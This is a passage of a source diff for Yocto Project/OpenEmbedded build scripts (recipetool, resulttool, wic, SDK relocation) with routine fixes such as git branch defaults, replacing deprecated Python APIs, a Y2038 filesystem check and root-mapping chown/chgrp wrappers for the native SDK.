964 ' mv ${S}/.config ${S}/.config.old\n'
965 ' fi\n'
966 '}\n')
962 if rd.getVarFlag('do_menuconfig','task'): 967 if rd.getVarFlag('do_menuconfig','task'):
963 f.write('\ndo_configure_append() {\n' 968 f.write('\ndo_configure_append() {\n'
964 ' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n' 969 ' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n'
diff --git a/scripts/lib/recipetool/create.py b/scripts/lib/recipetool/create.py
index 566c75369a..a2c6d052a6 100644
--- a/scripts/lib/recipetool/create.py
+++ b/scripts/lib/recipetool/create.py
@@ -435,7 +435,7 @@ def create_recipe(args):
435 if args.binary: 435 if args.binary:
436 # Assume the archive contains the directory structure verbatim 436 # Assume the archive contains the directory structure verbatim
437 # so we need to extract to a subdirectory 437 # so we need to extract to a subdirectory
438 fetchuri += ';subdir=${BP}' 438 fetchuri += ';subdir=${BPN}'
439 srcuri = fetchuri 439 srcuri = fetchuri
440 rev_re = re.compile(';rev=([^;]+)') 440 rev_re = re.compile(';rev=([^;]+)')
441 res = rev_re.search(srcuri) 441 res = rev_re.search(srcuri)
@@ -478,6 +478,9 @@ def create_recipe(args):
478 storeTagName = params['tag'] 478 storeTagName = params['tag']
479 params['nobranch'] = '1' 479 params['nobranch'] = '1'
480 del params['tag'] 480 del params['tag']
481 # Assume 'master' branch if not set
482 if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params:
483 params['branch'] = 'master'
481 fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params)) 484 fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params))
482 485
483 tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR') 486 tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR')
@@ -527,10 +530,9 @@ def create_recipe(args):
527 # Remove HEAD reference point and drop remote prefix 530 # Remove HEAD reference point and drop remote prefix
528 get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')] 531 get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')]
529 if 'master' in get_branch: 532 if 'master' in get_branch:
530 # If it is master, we do not need to append 'branch=master' as this is default.
531 # Even with the case where get_branch has multiple objects, if 'master' is one 533 # Even with the case where get_branch has multiple objects, if 'master' is one
532 # of them, we should default take from 'master' 534 # of them, we should default take from 'master'
533 srcbranch = '' 535 srcbranch = 'master'
534 elif len(get_branch) == 1: 536 elif len(get_branch) == 1:
535 # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch' 537 # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch'
536 srcbranch = get_branch[0] 538 srcbranch = get_branch[0]
@@ -543,8 +545,8 @@ def create_recipe(args):
543 # Since we might have a value in srcbranch, we need to 545 # Since we might have a value in srcbranch, we need to
544 # recontruct the srcuri to include 'branch' in params. 546 # recontruct the srcuri to include 'branch' in params.
545 scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri) 547 scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri)
546 if srcbranch: 548 if scheme in ['git', 'gitsm']:
547 params['branch'] = srcbranch 549 params['branch'] = srcbranch or 'master'
548 550
549 if storeTagName and scheme in ['git', 'gitsm']: 551 if storeTagName and scheme in ['git', 'gitsm']:
550 # Check srcrev using tag and check validity of the tag 552 # Check srcrev using tag and check validity of the tag
@@ -603,7 +605,7 @@ def create_recipe(args):
603 splitline = line.split() 605 splitline = line.split()
604 if len(splitline) > 1: 606 if len(splitline) > 1:
605 if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]): 607 if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]):
606 srcuri = reformat_git_uri(splitline[1]) 608 srcuri = reformat_git_uri(splitline[1]) + ';branch=master'
607 srcsubdir = 'git' 609 srcsubdir = 'git'
608 break 610 break
609 611
@@ -743,6 +745,10 @@ def create_recipe(args):
743 for handler in handlers: 745 for handler in handlers:
744 handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues) 746 handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues)
745 747
748 # native and nativesdk classes are special and must be inherited last
749 # If present, put them at the end of the classes list
750 classes.sort(key=lambda c: c in ("native", "nativesdk"))
751
746 extrafiles = extravalues.pop('extrafiles', {}) 752 extrafiles = extravalues.pop('extrafiles', {})
747 extra_pn = extravalues.pop('PN', None) 753 extra_pn = extravalues.pop('PN', None)
748 extra_pv = extravalues.pop('PV', None) 754 extra_pv = extravalues.pop('PV', None)
diff --git a/scripts/lib/resulttool/report.py b/scripts/lib/resulttool/report.py
index f0ca50ebe2..a349510ab8 100644
--- a/scripts/lib/resulttool/report.py
+++ b/scripts/lib/resulttool/report.py
@@ -176,7 +176,10 @@ class ResultsTextReport(object):
176 vals['sort'] = line['testseries'] + "_" + line['result_id'] 176 vals['sort'] = line['testseries'] + "_" + line['result_id']
177 vals['failed_testcases'] = line['failed_testcases'] 177 vals['failed_testcases'] = line['failed_testcases']
178 for k in cols: 178 for k in cols:
179 vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f')) 179 if total_tested:
180 vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
181 else:
182 vals[k] = "0 (0%)"
180 for k in maxlen: 183 for k in maxlen:
181 if k in vals and len(vals[k]) > maxlen[k]: 184 if k in vals and len(vals[k]) > maxlen[k]:
182 maxlen[k] = len(vals[k]) 185 maxlen[k] = len(vals[k])
diff --git a/scripts/lib/resulttool/resultutils.py b/scripts/lib/resulttool/resultutils.py
index 8917022d36..c5521d81bd 100644
--- a/scripts/lib/resulttool/resultutils.py
+++ b/scripts/lib/resulttool/resultutils.py
@@ -58,7 +58,11 @@ def append_resultsdata(results, f, configmap=store_map, configvars=extra_configv
58 testseries = posixpath.basename(posixpath.dirname(url.path)) 58 testseries = posixpath.basename(posixpath.dirname(url.path))
59 else: 59 else:
60 with open(f, "r") as filedata: 60 with open(f, "r") as filedata:
61 data = json.load(filedata) 61 try:
62 data = json.load(filedata)
63 except json.decoder.JSONDecodeError:
64 print("Cannot decode {}. Possible corruption. Skipping.".format(f))
65 data = ""
62 testseries = os.path.basename(os.path.dirname(f)) 66 testseries = os.path.basename(os.path.dirname(f))
63 else: 67 else:
64 data = f 68 data = f
@@ -142,7 +146,7 @@ def generic_get_log(sectionname, results, section):
142 return decode_log(ptest['log']) 146 return decode_log(ptest['log'])
143 147
144def ptestresult_get_log(results, section): 148def ptestresult_get_log(results, section):
145 return generic_get_log('ptestresuls.sections', results, section) 149 return generic_get_log('ptestresult.sections', results, section)
146 150
147def generic_get_rawlogs(sectname, results): 151def generic_get_rawlogs(sectname, results):
148 if sectname not in results: 152 if sectname not in results:
diff --git a/scripts/lib/scriptutils.py b/scripts/lib/scriptutils.py
index f92255d8dc..47a08194d0 100644
--- a/scripts/lib/scriptutils.py
+++ b/scripts/lib/scriptutils.py
@@ -18,7 +18,8 @@ import sys
18import tempfile 18import tempfile
19import threading 19import threading
20import importlib 20import importlib
21from importlib import machinery 21import importlib.machinery
22import importlib.util
22 23
23class KeepAliveStreamHandler(logging.StreamHandler): 24class KeepAliveStreamHandler(logging.StreamHandler):
24 def __init__(self, keepalive=True, **kwargs): 25 def __init__(self, keepalive=True, **kwargs):
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath):
82 logger.debug('Loading plugin %s' % name) 83 logger.debug('Loading plugin %s' % name)
83 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) 84 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
84 if spec: 85 if spec:
85 return spec.loader.load_module() 86 mod = importlib.util.module_from_spec(spec)
87 spec.loader.exec_module(mod)
88 return mod
86 89
87 def plugin_name(filename): 90 def plugin_name(filename):
88 return os.path.splitext(os.path.basename(filename))[0] 91 return os.path.splitext(os.path.basename(filename))[0]
@@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr
215 pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE'] 218 pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE']
216 for pathvar in pathvars: 219 for pathvar in pathvars:
217 path = rd.getVar(pathvar) 220 path = rd.getVar(pathvar)
218 shutil.rmtree(path) 221 if os.path.exists(path):
222 shutil.rmtree(path)
219 finally: 223 finally:
220 if fetchrecipe: 224 if fetchrecipe:
221 try: 225 try:
diff --git a/scripts/lib/wic/engine.py b/scripts/lib/wic/engine.py
index 9ff4394757..7dbde85696 100644
--- a/scripts/lib/wic/engine.py
+++ b/scripts/lib/wic/engine.py
@@ -19,10 +19,10 @@ import os
19import tempfile 19import tempfile
20import json 20import json
21import subprocess 21import subprocess
22import shutil
22import re 23import re
23 24
24from collections import namedtuple, OrderedDict 25from collections import namedtuple, OrderedDict
25from distutils.spawn import find_executable
26 26
27from wic import WicError 27from wic import WicError
28from wic.filemap import sparse_copy 28from wic.filemap import sparse_copy
@@ -245,7 +245,7 @@ class Disk:
245 for path in pathlist.split(':'): 245 for path in pathlist.split(':'):
246 self.paths = "%s%s:%s" % (native_sysroot, path, self.paths) 246 self.paths = "%s%s:%s" % (native_sysroot, path, self.paths)
247 247
248 self.parted = find_executable("parted", self.paths) 248 self.parted = shutil.which("parted", path=self.paths)
249 if not self.parted: 249 if not self.parted:
250 raise WicError("Can't find executable parted") 250 raise WicError("Can't find executable parted")
251 251
@@ -283,7 +283,7 @@ class Disk:
283 "resize2fs", "mkswap", "mkdosfs", "debugfs"): 283 "resize2fs", "mkswap", "mkdosfs", "debugfs"):
284 aname = "_%s" % name 284 aname = "_%s" % name
285 if aname not in self.__dict__: 285 if aname not in self.__dict__:
286 setattr(self, aname, find_executable(name, self.paths)) 286 setattr(self, aname, shutil.which(name, path=self.paths))
287 if aname not in self.__dict__ or self.__dict__[aname] is None: 287 if aname not in self.__dict__ or self.__dict__[aname] is None:
288 raise WicError("Can't find executable '{}'".format(name)) 288 raise WicError("Can't find executable '{}'".format(name))
289 return self.__dict__[aname] 289 return self.__dict__[aname]
diff --git a/scripts/lib/wic/help.py b/scripts/lib/wic/help.py
index 62a2a90e79..fcace95ff4 100644
--- a/scripts/lib/wic/help.py
+++ b/scripts/lib/wic/help.py
@@ -840,8 +840,8 @@ DESCRIPTION
840 meanings. The commands are based on the Fedora kickstart 840 meanings. The commands are based on the Fedora kickstart
841 documentation but with modifications to reflect wic capabilities. 841 documentation but with modifications to reflect wic capabilities.
842 842
843 http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition 843 https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition
844 http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader 844 https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader
845 845
846 Commands 846 Commands
847 847
diff --git a/scripts/lib/wic/misc.py b/scripts/lib/wic/misc.py
index e4b5a0d519..3e11822996 100644
--- a/scripts/lib/wic/misc.py
+++ b/scripts/lib/wic/misc.py
@@ -16,9 +16,9 @@ import logging
16import os 16import os
17import re 17import re
18import subprocess 18import subprocess
19import shutil
19 20
20from collections import defaultdict 21from collections import defaultdict
21from distutils import spawn
22 22
23from wic import WicError 23from wic import WicError
24 24
@@ -26,6 +26,7 @@ logger = logging.getLogger('wic')
26 26
27# executable -> recipe pairs for exec_native_cmd 27# executable -> recipe pairs for exec_native_cmd
28NATIVE_RECIPES = {"bmaptool": "bmap-tools", 28NATIVE_RECIPES = {"bmaptool": "bmap-tools",
29 "dumpe2fs": "e2fsprogs",
29 "grub-mkimage": "grub-efi", 30 "grub-mkimage": "grub-efi",
30 "isohybrid": "syslinux", 31 "isohybrid": "syslinux",
31 "mcopy": "mtools", 32 "mcopy": "mtools",
@@ -45,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools",
45 "parted": "parted", 46 "parted": "parted",
46 "sfdisk": "util-linux", 47 "sfdisk": "util-linux",
47 "sgdisk": "gptfdisk", 48 "sgdisk": "gptfdisk",
48 "syslinux": "syslinux" 49 "syslinux": "syslinux",
50 "tar": "tar"
49 } 51 }
50 52
51def runtool(cmdln_or_args): 53def runtool(cmdln_or_args):
@@ -112,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False):
112 """ 114 """
113 return _exec_cmd(cmd_and_args, as_shell)[1] 115 return _exec_cmd(cmd_and_args, as_shell)[1]
114 116
117def find_executable(cmd, paths):
118 recipe = cmd
119 if recipe in NATIVE_RECIPES:
120 recipe = NATIVE_RECIPES[recipe]
121 provided = get_bitbake_var("ASSUME_PROVIDED")
122 if provided and "%s-native" % recipe in provided:
123 return True
124
125 return shutil.which(cmd, path=paths)
115 126
116def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): 127def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
117 """ 128 """
@@ -140,7 +151,7 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
140 logger.debug("exec_native_cmd: %s", native_cmd_and_args) 151 logger.debug("exec_native_cmd: %s", native_cmd_and_args)
141 152
142 # If the command isn't in the native sysroot say we failed. 153 # If the command isn't in the native sysroot say we failed.
143 if spawn.find_executable(args[0], native_paths): 154 if find_executable(args[0], native_paths):
144 ret, out = _exec_cmd(native_cmd_and_args, True) 155 ret, out = _exec_cmd(native_cmd_and_args, True)
145 else: 156 else:
146 ret = 127 157 ret = 127
diff --git a/scripts/lib/wic/partition.py b/scripts/lib/wic/partition.py
index e574f40c47..792bb3dcd3 100644
--- a/scripts/lib/wic/partition.py
+++ b/scripts/lib/wic/partition.py
@@ -104,7 +104,7 @@ class Partition():
104 extra_blocks = self.extra_space 104 extra_blocks = self.extra_space
105 105
106 rootfs_size = actual_rootfs_size + extra_blocks 106 rootfs_size = actual_rootfs_size + extra_blocks
107 rootfs_size *= self.overhead_factor 107 rootfs_size = int(rootfs_size * self.overhead_factor)
108 108
109 logger.debug("Added %d extra blocks to %s to get to %d total blocks", 109 logger.debug("Added %d extra blocks to %s to get to %d total blocks",
110 extra_blocks, self.mountpoint, rootfs_size) 110 extra_blocks, self.mountpoint, rootfs_size)
@@ -298,6 +298,8 @@ class Partition():
298 mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs) 298 mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs)
299 exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo) 299 exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
300 300
301 self.check_for_Y2038_problem(rootfs, native_sysroot)
302
301 def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir, 303 def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
302 native_sysroot, pseudo): 304 native_sysroot, pseudo):
303 """ 305 """
@@ -388,6 +390,8 @@ class Partition():
388 (self.fstype, extraopts, label_str, self.fsuuid, rootfs) 390 (self.fstype, extraopts, label_str, self.fsuuid, rootfs)
389 exec_native_cmd(mkfs_cmd, native_sysroot) 391 exec_native_cmd(mkfs_cmd, native_sysroot)
390 392
393 self.check_for_Y2038_problem(rootfs, native_sysroot)
394
391 def prepare_empty_partition_btrfs(self, rootfs, oe_builddir, 395 def prepare_empty_partition_btrfs(self, rootfs, oe_builddir,
392 native_sysroot): 396 native_sysroot):
393 """ 397 """
@@ -449,3 +453,37 @@ class Partition():
449 453
450 mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path) 454 mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path)
451 exec_native_cmd(mkswap_cmd, native_sysroot) 455 exec_native_cmd(mkswap_cmd, native_sysroot)
456
457 def check_for_Y2038_problem(self, rootfs, native_sysroot):
458 """
459 Check if the filesystem is affected by the Y2038 problem
460 (Y2038 problem = 32 bit time_t overflow in January 2038)
461 """
462 def get_err_str(part):
463 err = "The {} filesystem {} has no Y2038 support."
464 if part.mountpoint:
465 args = [part.fstype, "mounted at %s" % part.mountpoint]
466 elif part.label:
467 args = [part.fstype, "labeled '%s'" % part.label]
468 elif part.part_name:
469 args = [part.fstype, "in partition '%s'" % part.part_name]
470 else:
471 args = [part.fstype, "in partition %s" % part.num]
472 return err.format(*args)
473
474 # ext2 and ext3 are always affected by the Y2038 problem
475 if self.fstype in ["ext2", "ext3"]:
476 logger.warn(get_err_str(self))
477 return
478
479 ret, out = exec_native_cmd("dumpe2fs %s" % rootfs, native_sysroot)
480
481 # if ext4 is affected by the Y2038 problem depends on the inode size
482 for line in out.splitlines():
483 if line.startswith("Inode size:"):
484 size = int(line.split(":")[1].strip())
485 if size < 256:
486 logger.warn("%s Inodes (of size %d) are too small." %
487 (get_err_str(self), size))
488 break
489
diff --git a/scripts/lib/wic/pluginbase.py b/scripts/lib/wic/pluginbase.py
index d9b4e57747..b64568339b 100644
--- a/scripts/lib/wic/pluginbase.py
+++ b/scripts/lib/wic/pluginbase.py
@@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin']
9 9
10import os 10import os
11import logging 11import logging
12import types
12 13
13from collections import defaultdict 14from collections import defaultdict
14from importlib.machinery import SourceFileLoader 15import importlib
16import importlib.util
15 17
16from wic import WicError 18from wic import WicError
17from wic.misc import get_bitbake_var 19from wic.misc import get_bitbake_var
@@ -54,7 +56,9 @@ class PluginMgr:
54 mname = fname[:-3] 56 mname = fname[:-3]
55 mpath = os.path.join(ppath, fname) 57 mpath = os.path.join(ppath, fname)
56 logger.debug("loading plugin module %s", mpath) 58 logger.debug("loading plugin module %s", mpath)
57 SourceFileLoader(mname, mpath).load_module() 59 spec = importlib.util.spec_from_file_location(mname, mpath)
60 module = importlib.util.module_from_spec(spec)
61 spec.loader.exec_module(module)
58 62
59 return PLUGINS.get(ptype) 63 return PLUGINS.get(ptype)
60 64
diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py
index 7e1c1c03ab..42704d1e10 100644
--- a/scripts/lib/wic/plugins/imager/direct.py
+++ b/scripts/lib/wic/plugins/imager/direct.py
@@ -115,7 +115,7 @@ class DirectPlugin(ImagerPlugin):
115 updated = False 115 updated = False
116 for part in self.parts: 116 for part in self.parts:
117 if not part.realnum or not part.mountpoint \ 117 if not part.realnum or not part.mountpoint \
118 or part.mountpoint == "/": 118 or part.mountpoint == "/" or not (part.mountpoint.startswith('/') or part.mountpoint == "swap"):
119 continue 119 continue
120 120
121 if part.use_uuid: 121 if part.use_uuid:
diff --git a/scripts/lib/wic/plugins/source/bootimg-efi.py b/scripts/lib/wic/plugins/source/bootimg-efi.py
index 2cfdc10ecd..05e8471116 100644
--- a/scripts/lib/wic/plugins/source/bootimg-efi.py
+++ b/scripts/lib/wic/plugins/source/bootimg-efi.py
@@ -277,6 +277,13 @@ class BootimgEFIPlugin(SourcePlugin):
277 logger.debug("Added %d extra blocks to %s to get to %d total blocks", 277 logger.debug("Added %d extra blocks to %s to get to %d total blocks",
278 extra_blocks, part.mountpoint, blocks) 278 extra_blocks, part.mountpoint, blocks)
279 279
280 # required for compatibility with certain devices expecting file system
281 # block count to be equal to partition block count
282 if blocks < part.fixed_size:
283 blocks = part.fixed_size
284 logger.debug("Overriding %s to %d total blocks for compatibility",
285 part.mountpoint, blocks)
286
280 # dosfs image, created by mkdosfs 287 # dosfs image, created by mkdosfs
281 bootimg = "%s/boot.img" % cr_workdir 288 bootimg = "%s/boot.img" % cr_workdir
282 289
diff --git a/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
index f2639e7004..32e47f1831 100644
--- a/scripts/lib/wic/plugins/source/bootimg-pcbios.py
+++ b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
@@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin):
186 # dosfs image, created by mkdosfs 186 # dosfs image, created by mkdosfs
187 bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno) 187 bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno)
188 188
189 dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \ 189 label = part.label if part.label else "boot"
190 (part.fsuuid, bootimg, blocks) 190
191 dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \
192 (label, part.fsuuid, bootimg, blocks)
191 exec_native_cmd(dosfs_cmd, native_sysroot) 193 exec_native_cmd(dosfs_cmd, native_sysroot)
192 194
193 mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir) 195 mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir)
diff --git a/scripts/nativesdk-intercept/chgrp b/scripts/nativesdk-intercept/chgrp
new file mode 100755
index 0000000000..30cc417d3a
--- /dev/null
+++ b/scripts/nativesdk-intercept/chgrp
@@ -0,0 +1,27 @@
1#!/usr/bin/env python3
2#
3# Wrapper around 'chgrp' that redirects to root in all cases
4
5import os
6import shutil
7import sys
8
9# calculate path to the real 'chgrp'
10path = os.environ['PATH']
11path = path.replace(os.path.dirname(sys.argv[0]), '')
12real_chgrp = shutil.which('chgrp', path=path)
13
14args = list()
15
16found = False
17for i in sys.argv:
18 if i.startswith("-"):
19 args.append(i)
20 continue
21 if not found:
22 args.append("root")
23 found = True
24 else:
25 args.append(i)
26
27os.execv(real_chgrp, args)
diff --git a/scripts/nativesdk-intercept/chown b/scripts/nativesdk-intercept/chown
new file mode 100755
index 0000000000..3914b3e384
--- /dev/null
+++ b/scripts/nativesdk-intercept/chown
@@ -0,0 +1,27 @@
1#!/usr/bin/env python3
2#
3# Wrapper around 'chown' that redirects to root in all cases
4
5import os
6import shutil
7import sys
8
9# calculate path to the real 'chown'
10path = os.environ['PATH']
11path = path.replace(os.path.dirname(sys.argv[0]), '')
12real_chown = shutil.which('chown', path=path)
13
14args = list()
15
16found = False
17for i in sys.argv:
18 if i.startswith("-"):
19 args.append(i)
20 continue
21 if not found:
22 args.append("root:root")
23 found = True
24 else:
25 args.append(i)
26
27os.execv(real_chown, args)
diff --git a/scripts/oe-depends-dot b/scripts/oe-depends-dot
index 5eb3e12769..1c2d51c6ec 100755
--- a/scripts/oe-depends-dot
+++ b/scripts/oe-depends-dot
@@ -15,7 +15,7 @@ class Dot(object):
15 def __init__(self): 15 def __init__(self):
16 parser = argparse.ArgumentParser( 16 parser = argparse.ArgumentParser(
17 description="Analyse recipe-depends.dot generated by bitbake -g", 17 description="Analyse recipe-depends.dot generated by bitbake -g",
18 epilog="Use %(prog)s --help to get help") 18 formatter_class=argparse.RawDescriptionHelpFormatter)
19 parser.add_argument("dotfile", 19 parser.add_argument("dotfile",
20 help = "Specify the dotfile", nargs = 1, action='store', default='') 20 help = "Specify the dotfile", nargs = 1, action='store', default='')
21 parser.add_argument("-k", "--key", 21 parser.add_argument("-k", "--key",
@@ -32,6 +32,21 @@ class Dot(object):
32 " For example, A->B, B->C, A->C, then A->C can be removed.", 32 " For example, A->B, B->C, A->C, then A->C can be removed.",
33 action="store_true", default=False) 33 action="store_true", default=False)
34 34
35 parser.epilog = """
36Examples:
37First generate the .dot file:
38 bitbake -g core-image-minimal
39
40To find out why a package is being built:
41 %(prog)s -k <package> -w ./task-depends.dot
42
43To find out what a package depends on:
44 %(prog)s -k <package> -d ./task-depends.dot
45
46Reduce the .dot file packages only, no tasks:
47 %(prog)s -r ./task-depends.dot
48"""
49
35 self.args = parser.parse_args() 50 self.args = parser.parse_args()
36 51
37 if len(sys.argv) != 3 and len(sys.argv) < 5: 52 if len(sys.argv) != 3 and len(sys.argv) < 5:
@@ -99,6 +114,10 @@ class Dot(object):
99 if key == "meta-world-pkgdata": 114 if key == "meta-world-pkgdata":
100 continue 115 continue
101 dep = m.group(2) 116 dep = m.group(2)
117 key = key.split('.')[0]
118 dep = dep.split('.')[0]
119 if key == dep:
120 continue
102 if key in depends: 121 if key in depends:
103 if not key in depends[key]: 122 if not key in depends[key]:
104 depends[key].add(dep) 123 depends[key].add(dep)
diff --git a/scripts/oe-pkgdata-browser b/scripts/oe-pkgdata-browser
index 8d223185a4..65a6ee956e 100755
--- a/scripts/oe-pkgdata-browser
+++ b/scripts/oe-pkgdata-browser
@@ -236,6 +236,8 @@ class PkgUi():
236 update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False) 236 update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False)
237 237
238 def load_recipes(self): 238 def load_recipes(self):
239 if not os.path.exists(pkgdata):
240 sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata)
239 for recipe in sorted(os.listdir(pkgdata)): 241 for recipe in sorted(os.listdir(pkgdata)):
240 if os.path.isfile(os.path.join(pkgdata, recipe)): 242 if os.path.isfile(os.path.join(pkgdata, recipe)):
241 self.recipe_iters[recipe] = self.recipe_store.append([recipe]) 243 self.recipe_iters[recipe] = self.recipe_store.append([recipe])
diff --git a/scripts/oe-setup-builddir b/scripts/oe-setup-builddir
index 30eaa8efbe..5a51fa793f 100755
--- a/scripts/oe-setup-builddir
+++ b/scripts/oe-setup-builddir
@@ -113,10 +113,10 @@ if [ ! -z "$SHOWYPDOC" ]; then
113 cat <<EOM 113 cat <<EOM
114The Yocto Project has extensive documentation about OE including a reference 114The Yocto Project has extensive documentation about OE including a reference
115manual which can be found at: 115manual which can be found at:
116 http://yoctoproject.org/documentation 116 https://docs.yoctoproject.org
117 117
118For more information about OpenEmbedded see their website: 118For more information about OpenEmbedded see their website:
119 http://www.openembedded.org/ 119 https://www.openembedded.org/
120 120
121EOM 121EOM
122# unset SHOWYPDOC 122# unset SHOWYPDOC
diff --git a/scripts/pybootchartgui/pybootchartgui/draw.py b/scripts/pybootchartgui/pybootchartgui/draw.py
index 53324b9f8b..fc708b55c3 100644
--- a/scripts/pybootchartgui/pybootchartgui/draw.py
+++ b/scripts/pybootchartgui/pybootchartgui/draw.py
@@ -267,11 +267,14 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range):
267 # avoid divide by zero 267 # avoid divide by zero
268 if max_y == 0: 268 if max_y == 0:
269 max_y = 1.0 269 max_y = 1.0
270 xscale = float (chart_bounds[2]) / (max_x - x_shift) 270 if (max_x - x_shift):
271 xscale = float (chart_bounds[2]) / (max_x - x_shift)
272 else:
273 xscale = float (chart_bounds[2])
271 # If data_range is given, scale the chart so that the value range in 274 # If data_range is given, scale the chart so that the value range in
272 # data_range matches the chart bounds exactly. 275 # data_range matches the chart bounds exactly.
273 # Otherwise, scale so that the actual data matches the chart bounds. 276 # Otherwise, scale so that the actual data matches the chart bounds.
274 if data_range: 277 if data_range and (data_range[1] - data_range[0]):
275 yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0]) 278 yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0])
276 ybase = data_range[0] 279 ybase = data_range[0]
277 else: 280 else:
diff --git a/scripts/pybootchartgui/pybootchartgui/parsing.py b/scripts/pybootchartgui/pybootchartgui/parsing.py
index b42dac6b88..9d6787ec5a 100644
--- a/scripts/pybootchartgui/pybootchartgui/parsing.py
+++ b/scripts/pybootchartgui/pybootchartgui/parsing.py
@@ -128,7 +128,7 @@ class Trace:
128 def compile(self, writer): 128 def compile(self, writer):
129 129
130 def find_parent_id_for(pid): 130 def find_parent_id_for(pid):
131 if pid is 0: 131 if pid == 0:
132 return 0 132 return 0
133 ppid = self.parent_map.get(pid) 133 ppid = self.parent_map.get(pid)
134 if ppid: 134 if ppid:
diff --git a/scripts/relocate_sdk.py b/scripts/relocate_sdk.py
index 8c0fdb986a..8079d13750 100755
--- a/scripts/relocate_sdk.py
+++ b/scripts/relocate_sdk.py
@@ -97,11 +97,12 @@ def change_interpreter(elf_file_name):
97 if (len(new_dl_path) >= p_filesz): 97 if (len(new_dl_path) >= p_filesz):
98 print("ERROR: could not relocate %s, interp size = %i and %i is needed." \ 98 print("ERROR: could not relocate %s, interp size = %i and %i is needed." \
99 % (elf_file_name, p_memsz, len(new_dl_path) + 1)) 99 % (elf_file_name, p_memsz, len(new_dl_path) + 1))
100 break 100 return False
101 dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path)) 101 dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path))
102 f.seek(p_offset) 102 f.seek(p_offset)
103 f.write(dl_path) 103 f.write(dl_path)
104 break 104 break
105 return True
105 106
106def change_dl_sysdirs(elf_file_name): 107def change_dl_sysdirs(elf_file_name):
107 if arch == 32: 108 if arch == 32:
@@ -215,6 +216,7 @@ else:
215 216
216executables_list = sys.argv[3:] 217executables_list = sys.argv[3:]
217 218
219errors = False
218for e in executables_list: 220for e in executables_list:
219 perms = os.stat(e)[stat.ST_MODE] 221 perms = os.stat(e)[stat.ST_MODE]
220 if os.access(e, os.W_OK|os.R_OK): 222 if os.access(e, os.W_OK|os.R_OK):
@@ -240,7 +242,8 @@ for e in executables_list:
240 arch = get_arch() 242 arch = get_arch()
241 if arch: 243 if arch:
242 parse_elf_header() 244 parse_elf_header()
243 change_interpreter(e) 245 if not change_interpreter(e):
246 errors = True
244 change_dl_sysdirs(e) 247 change_dl_sysdirs(e)
245 248
246 """ change permissions back """ 249 """ change permissions back """
@@ -253,3 +256,6 @@ for e in executables_list:
253 print("New file size for %s is different. Looks like a relocation error!", e) 256 print("New file size for %s is different. Looks like a relocation error!", e)
254 sys.exit(-1) 257 sys.exit(-1)
255 258
259if errors:
260 print("Relocation of one or more executables failed.")
261 sys.exit(-1)
diff --git a/scripts/runqemu b/scripts/runqemu
